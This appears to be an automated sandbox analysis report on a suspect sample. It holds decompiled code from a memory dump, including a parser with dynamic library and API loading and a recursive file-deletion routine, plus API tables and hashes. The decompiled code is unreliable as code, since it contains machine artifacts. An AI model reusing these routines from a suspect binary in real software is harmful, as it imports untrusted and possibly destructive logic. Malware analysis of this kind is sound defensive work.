											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73CA1215();
											 &_v12 = E73CA1A36( &_v12);
											__eax = E73CA1429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73CA1A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73CA1A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x73ca305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73CA1A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323); // executed
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E73CA15C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E73CA12FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E73CA15C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323); // executed
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E73CA12FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E73CA12FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E73CA12FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E73CA1224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E73CA12FE(_t90) * 4);
					goto L165;
				}
			}

0x73ca1aa0
0x73ca1aa3
0x73ca1aa6
0x73ca1aa9
0x73ca1aac
0x73ca1aaf
0x73ca1ab2
0x73ca1ab4
0x73ca1ab7
0x73ca1aba
0x73ca1abf
0x73ca1ac2
0x73ca1aca
0x73ca1ad2
0x73ca1ad4
0x73ca1ad7
0x73ca1adf
0x73ca1adf
0x73ca1ae4
0x73ca1ae7
0x00000000
0x00000000
0x73ca1af1
0x73ca1af3
0x73ca1af8
0x73ca1afa
0x73ca1b8b
0x73ca1b8b
0x73ca1b8b
0x73ca1b8f
0x73ca1b92
0x73ca1b94
0x73ca1bb6
0x73ca1bb9
0x73ca1bbb
0x73ca1bc4
0x73ca1bca
0x73ca1bcc
0x73ca1bd2
0x73ca1bd2
0x73ca1bd8
0x73ca1bdb
0x73ca1bdb
0x73ca1bde
0x73ca1bde
0x73ca1be4
0x73ca1be6
0x73ca1be9
0x73ca1bef
0x73ca1bf2
0x73ca1bf2
0x73ca1bf4
0x73ca1bfa
0x73ca1bfd
0x73ca1c21
0x73ca1c24
0x00000000
0x00000000
0x73ca1c27
0x73ca1c29
0x73ca1c37
0x73ca1c3a
0x73ca1c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x73ca1c3e
0x73ca1c3e
0x73ca1c3e
0x73ca1c44
0x73ca1c46
0x00000000
0x00000000
0x73ca1c48
0x73ca1c4a
0x73ca1c4c
0x73ca1c4e
0x00000000
0x00000000
0x00000000
0x73ca1c4e
0x73ca1c50
0x73ca1c52
0x73ca1c54
0x73ca1c54
0x73ca1c5a
0x73ca1c60
0x73ca1c62
0x73ca1c76
0x73ca1c76
0x73ca1c78
0x73ca1c64
0x73ca1c6a
0x73ca1c6d
0x73ca1c6d
0x00000000
0x73ca1bff
0x73ca1bff
0x73ca1bff
0x73ca1c00
0x73ca1c08
0x73ca1c0c
0x73ca1c12
0x73ca1c16
0x00000000
0x73ca1c16
0x73ca1c02
0x73ca1c02
0x73ca1c03
0x00000000
0x00000000
0x73ca1c05
0x73ca1c06
0x00000000
0x00000000
0x00000000
0x73ca1c06
0x73ca1b96
0x73ca1b97
0x73ca1ba0
0x73ca1ba3
0x73ca1bb0
0x73ca1bb0
0x73ca1ba5
0x73ca1ba5
0x73ca1c7e
0x73ca1c81
0x73ca1c84
0x73ca1cf6
0x73ca1cfa
0x73ca1adc
0x00000000
0x73ca1adc
0x00000000
0x73ca1cfa
0x73ca1b94
0x73ca1b00
0x73ca1b03
0x73ca1b66
0x73ca1b69
0x73ca1b7a
0x73ca1b7a
0x73ca1b7d
0x73ca1c89
0x73ca1c8c
0x73ca1c8c
0x73ca1c8e
0x73ca2033
0x73ca2045
0x73ca2045
0x73ca2047
0x00000000
0x00000000
0x73ca2037
0x73ca2038
0x73ca203b
0x73ca203e
0x73ca20ba
0x73ca20c1
0x73ca20c6
0x73ca20c9
0x73ca1cf2
0x73ca1cf2
0x73ca1cf2
0x73ca1cf3
0x00000000
0x73ca1cf3
0x73ca2040
0x73ca2042
0x73ca2042
0x73ca2049
0x73ca204b
0x73ca20ae
0x73ca1ce7
0x73ca1cea
0x73ca1ced
0x73ca1cf0
0x73ca1cf0
0x00000000
0x73ca1cf0
0x73ca204d
0x73ca204f
0x73ca2055
0x73ca2055
0x73ca2057
0x73ca205a
0x73ca206d
0x73ca206d
0x73ca2070
0x73ca2073
0x00000000
0x00000000
0x73ca2075
0x73ca2078
0x00000000
0x00000000
0x73ca207a
0x73ca2081
0x73ca2081
0x73ca2087
0x73ca208a
0x73ca20a6
0x73ca208c
0x73ca2095
0x73ca2098
0x73ca2098
0x00000000
0x73ca208a
0x73ca205c
0x73ca205f
0x73ca2062
0x00000000
0x00000000
0x73ca2064
0x00000000
0x73ca2064
0x73ca2051
0x73ca2053
0x00000000
0x00000000
0x00000000
0x73ca2053
0x73ca1c94
0x73ca1c94
0x73ca1c95
0x73ca1dde
0x73ca1dde
0x73ca1de5
0x73ca1de8
0x00000000
0x00000000
0x73ca1df5
0x00000000
0x73ca1fdb
0x73ca1fde
0x73ca1fe1
0x73ca1fe1
0x73ca1fe2
0x73ca1fe5
0x73ca1fe7
0x73ca1fe9
0x00000000
0x00000000
0x73ca1feb
0x73ca1feb
0x73ca1fee
0x73ca2000
0x73ca2003
0x73ca2006
0x73ca200c
0x00000000
0x73ca200c
0x73ca1ff0
0x73ca1ff0
0x73ca1ff2
0x00000000
0x00000000
0x73ca1ff4
0x73ca1ff6
0x73ca1ff8
0x73ca1ff8
0x73ca1ff8
0x73ca1ff9
0x73ca1ffb
0x73ca1ffd
0x73ca1fe1
0x73ca1fe2
0x73ca1fe5
0x73ca1fe7
0x73ca1fe9
0x00000000
0x00000000
0x00000000
0x73ca1fe9
0x00000000
0x73ca1e3c
0x00000000
0x00000000
0x73ca1e48
0x00000000
0x00000000
0x73ca1e2f
0x73ca1e33
0x73ca1e37
0x00000000
0x00000000
0x73ca1fad
0x73ca1fb1
0x00000000
0x00000000
0x73ca1fb7
0x73ca1fbf
0x73ca1fc6
0x73ca1fce
0x00000000
0x00000000
0x73ca1f15
0x73ca1f15
0x00000000
0x00000000
0x73ca1e51
0x00000000
0x00000000
0x73ca202b
0x00000000
0x00000000
0x73ca1f1d
0x73ca1f1f
0x73ca1f1f
0x00000000
0x00000000
0x73ca201b
0x00000000
0x00000000
0x73ca201f
0x00000000
0x00000000
0x73ca2027
0x00000000
0x00000000
0x73ca1f64
0x73ca1f66
0x73ca1f66
0x00000000
0x00000000
0x73ca1f2f
0x73ca1f31
0x73ca1f31
0x00000000
0x00000000
0x73ca1f41
0x73ca1f43
0x73ca1f43
0x00000000
0x00000000
0x73ca1f72
0x73ca1f74
0x73ca1f74
0x00000000
0x00000000
0x73ca1f4c
0x73ca1f4e
0x73ca1f4e
0x00000000
0x00000000
0x73ca1f53
0x00000000
0x00000000
0x73ca2023
0x73ca202d
0x73ca202d
0x00000000
0x00000000
0x73ca1f7d
0x73ca1f81
0x73ca1f86
0x73ca1f89
0x73ca1f8a
0x73ca1f8d
0x73ca1f93
0x73ca1f93
0x00000000
0x00000000
0x73ca2013
0x00000000
0x00000000
0x73ca1f57
0x73ca1f57
0x00000000
0x00000000
0x73ca1e58
0x73ca1e58
0x00000000
0x00000000
0x73ca1f6b
0x73ca1f6d
0x73ca1f6d
0x00000000
0x00000000
0x73ca1dfc
0x73ca1e02
0x73ca1e05
0x73ca1e07
0x73ca1e07
0x73ca1e0a
0x73ca1e0e
0x73ca1e1b
0x73ca1e1d
0x73ca1e23
0x73ca1e23
0x73ca1e23
0x00000000
0x00000000
0x73ca1f20
0x73ca1f20
0x73ca1f22
0x73ca1f29
0x00000000
0x00000000
0x73ca1f67
0x73ca1f67
0x00000000
0x00000000
0x73ca1f32
0x73ca1f32
0x73ca1f34
0x73ca1f3b
0x00000000
0x00000000
0x73ca1f44
0x73ca1f44
0x73ca1f46
0x00000000
0x00000000
0x73ca1f75
0x73ca1f75
0x00000000
0x00000000
0x73ca1f4f
0x73ca1f4f
0x00000000
0x00000000
0x73ca1f9b
0x73ca1f9f
0x73ca1fa4
0x73ca1fa7
0x00000000
0x00000000
0x73ca1f59
0x73ca1f59
0x73ca1f5c
0x73ca1f5e
0x00000000
0x00000000
0x73ca1f6e
0x73ca1f6e
0x73ca1f77
0x73ca1f77
0x73ca1e5a
0x73ca1e5a
0x73ca1e5d
0x73ca1e64
0x73ca1e66
0x73ca1e68
0x73ca1e6f
0x73ca1e72
0x73ca1e77
0x73ca1e79
0x73ca1e7b
0x73ca1e7f
0x73ca1e85
0x73ca1e8b
0x73ca1e8b
0x73ca1e8d
0x73ca1e8d
0x73ca1e8e
0x73ca1e8e
0x73ca1e92
0x73ca1e98
0x73ca1e9a
0x73ca1e9e
0x73ca1ea3
0x73ca1ea3
0x73ca1ea5
0x73ca1ea5
0x73ca1ea8
0x73ca1eab
0x73ca1eb4
0x73ca1eb7
0x73ca1eba
0x73ca1eba
0x73ca1ebc
0x73ca1ebf
0x73ca1ec5
0x73ca1ecb
0x73ca1ecb
0x73ca1ecd
0x00000000
0x00000000
0x73ca1ed3
0x73ca1ed3
0x73ca1ed7
0x73ca1ede
0x73ca1f02
0x73ca1f02
0x73ca1f06
0x73ca1f08
0x73ca1f0b
0x73ca1f0b
0x73ca1f0e
0x73ca1f0e
0x00000000
0x73ca1f06
0x73ca1ee3
0x73ca1ee6
0x73ca1ee6
0x73ca1eed
0x73ca1eef
0x73ca1ef2
0x73ca1ef9
0x73ca1efa
0x73ca1f00
0x73ca1f00
0x00000000
0x73ca1f00
0x73ca1ef4
0x73ca1ef7
0x00000000
0x00000000
0x00000000
0x73ca1ef7
0x73ca1e87
0x73ca1e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73ca1df5
0x73ca1c9b
0x73ca1c9b
0x73ca1c9c
0x73ca1ddb
0x00000000
0x73ca1ddb
0x73ca1ca2
0x73ca1ca3
0x00000000
0x00000000
0x73ca1ca9
0x73ca1cac
0x73ca1da0
0x73ca1da0
0x73ca1da3
0x73ca1db8
0x73ca1dba
0x73ca1dba
0x73ca1dbb
0x73ca1dbe
0x73ca1dc1
0x73ca1dcd
0x73ca1dcd
0x73ca1dcd
0x73ca1dc3
0x73ca1dc3
0x73ca1dc3
0x73ca1dd3
0x00000000
0x73ca1dd3
0x73ca1da5
0x73ca1da5
0x73ca1da6
0x73ca1db4
0x00000000
0x73ca1db4
0x73ca1da9
0x73ca1daa
0x00000000
0x00000000
0x73ca1db0
0x00000000
0x73ca1db0
0x73ca1cb2
0x73ca1d9c
0x00000000
0x73ca1d9c
0x73ca1cb8
0x73ca1cb8
0x73ca1cbb
0x73ca1ce4
0x00000000
0x73ca1ce4
0x73ca1cbd
0x73ca1cbd
0x73ca1cc0
0x73ca1cda
0x00000000
0x73ca1cda
0x73ca1cc2
0x73ca1cc2
0x73ca1cc5
0x73ca1cd4
0x00000000
0x73ca1cd4
0x73ca1cc8
0x73ca1cc9
0x00000000
0x00000000
0x73ca1ccb
0x00000000
0x73ca1b83
0x73ca1b83
0x73ca1b86
0x00000000
0x73ca1b86
0x73ca1b7d
0x73ca1b6b
0x73ca1b6f
0x00000000
0x00000000
0x73ca1b71
0x73ca1b74
0x00000000
0x00000000
0x00000000
0x73ca1b74
0x73ca1b05
0x73ca1b08
0x73ca1b3e
0x73ca1b41
0x00000000
0x73ca1b47
0x73ca1b49
0x73ca1b4d
0x73ca1b54
0x73ca1b5b
0x73ca1b5e
0x73ca1b61
0x00000000
0x73ca1b61
0x73ca1b41
0x73ca1b0a
0x73ca1b0b
0x73ca1b26
0x73ca1b29
0x00000000
0x73ca1b2f
0x73ca1b2f
0x73ca1b36
0x73ca1b39
0x00000000
0x73ca1b39
0x73ca1b29
0x73ca1b10
0x00000000
0x73ca1b16
0x73ca1b16
0x73ca1b1d
0x00000000
0x73ca1b1d
0x73ca1b10
0x73ca1d09
0x73ca1d0e
0x73ca1d13
0x73ca1d17
0x73ca21c6
0x73ca21cc
0x73ca1d29
0x73ca1d2b
0x73ca1d2c
0x73ca20f1
0x73ca20f1
0x73ca20f4
0x73ca20f7
0x73ca2114
0x73ca211a
0x73ca211c
0x73ca2122
0x73ca2139
0x73ca2139
0x73ca2139
0x73ca2146
0x73ca214c
0x73ca214f
0x73ca2155
0x73ca2157
0x73ca215a
0x73ca215c
0x73ca2163
0x73ca2168
0x73ca216b
0x73ca216d
0x73ca2172
0x73ca2184
0x73ca2184
0x73ca2172
0x73ca216b
0x73ca215a
0x73ca218a
0x73ca218d
0x73ca2197
0x73ca219f
0x73ca21ab
0x73ca21b1
0x73ca21b4
0x73ca20e6
0x73ca20e6
0x00000000
0x73ca20e6
0x73ca21ba
0x73ca21c0
0x73ca21c0
0x00000000
0x00000000
0x73ca21c2
0x73ca21c2
0x73ca21c2
0x73ca21c2
0x00000000
0x73ca218f
0x73ca218f
0x73ca2195
0x00000000
0x00000000
0x00000000
0x73ca2195
0x73ca218d
0x73ca2125
0x73ca212b
0x73ca212d
0x73ca2133
0x00000000
0x00000000
0x00000000
0x73ca2133
0x73ca20f9
0x73ca2100
0x73ca2106
0x73ca210c
0x00000000
0x73ca210c
0x73ca1d32
0x73ca1d33
0x73ca20d0
0x73ca20d0
0x73ca20d6
0x73ca20d9
0x00000000
0x00000000
0x73ca20e0
0x73ca20e5
0x00000000
0x73ca20e5
0x73ca1d3a
0x00000000
0x00000000
0x73ca1d40
0x73ca1d40
0x73ca1d49
0x73ca1d4e
0x73ca1d54
0x00000000
0x00000000
0x73ca1d5a
0x73ca1d67
0x73ca1d6d
0x73ca1d77
0x73ca1d7d
0x73ca1d85
0x73ca1d95
0x00000000
0x73ca1d95

APIs

Part of subcall function 73CA1215: GlobalAlloc.KERNEL32(00000040,73CA1233,?,73CA12CF,-73CA404B,73CA11AB,-000000A0), ref: 73CA121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 73CA1BC4
lstrcpyA.KERNEL32(00000008,?), ref: 73CA1C0C
lstrcpyA.KERNEL32(00000408,?), ref: 73CA1C16
GlobalFree.KERNEL32 ref: 73CA1C29
GlobalFree.KERNEL32 ref: 73CA1D09
GlobalFree.KERNEL32 ref: 73CA1D0E
GlobalFree.KERNEL32 ref: 73CA1D13
GlobalFree.KERNEL32 ref: 73CA1EFA
lstrcpyA.KERNEL32(?,?), ref: 73CA2098
GetModuleHandleA.KERNEL32(00000008), ref: 73CA2114
LoadLibraryA.KERNEL32(00000008), ref: 73CA2125
GetProcAddress.KERNEL32(?,?), ref: 73CA217E
lstrlenA.KERNEL32(00000408), ref: 73CA2198

Memory Dump Source

Source File: 00000000.00000002.241965832.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true

Associated: 00000000.00000002.241959915.0000000073CA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241972886.0000000073CA3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241983655.0000000073CA5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: cc50f2ee78442a5c956f4ebe4aaeaff6ddb13c32555c3248f12cd16cc412ac3a
Instruction ID: 2aaa18b09e9434af74f677818533cb76de0729d85d8fad935e25becd6d34315c
Opcode Fuzzy Hash: cc50f2ee78442a5c956f4ebe4aaeaff6ddb13c32555c3248f12cd16cc412ac3a
Instruction Fuzzy Hash: 2822B971D0425B9FDB12CFADC9847ADBBF5FB04304F25852ED196EA280DB749A81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405a1f
0x00405a24
0x00405a2d
0x00405a30
0x00405a38
0x00405a3b
0x00405a3e
0x00405a46
0x00405a48
0x00405a49
0x00000000
0x00405a49
0x00405a54
0x00405a57
0x00405a57
0x00405a57
0x00405a5b
0x00405a6e
0x00405a75
0x00405a7a
0x00405a7e
0x00405a8e
0x00405a80
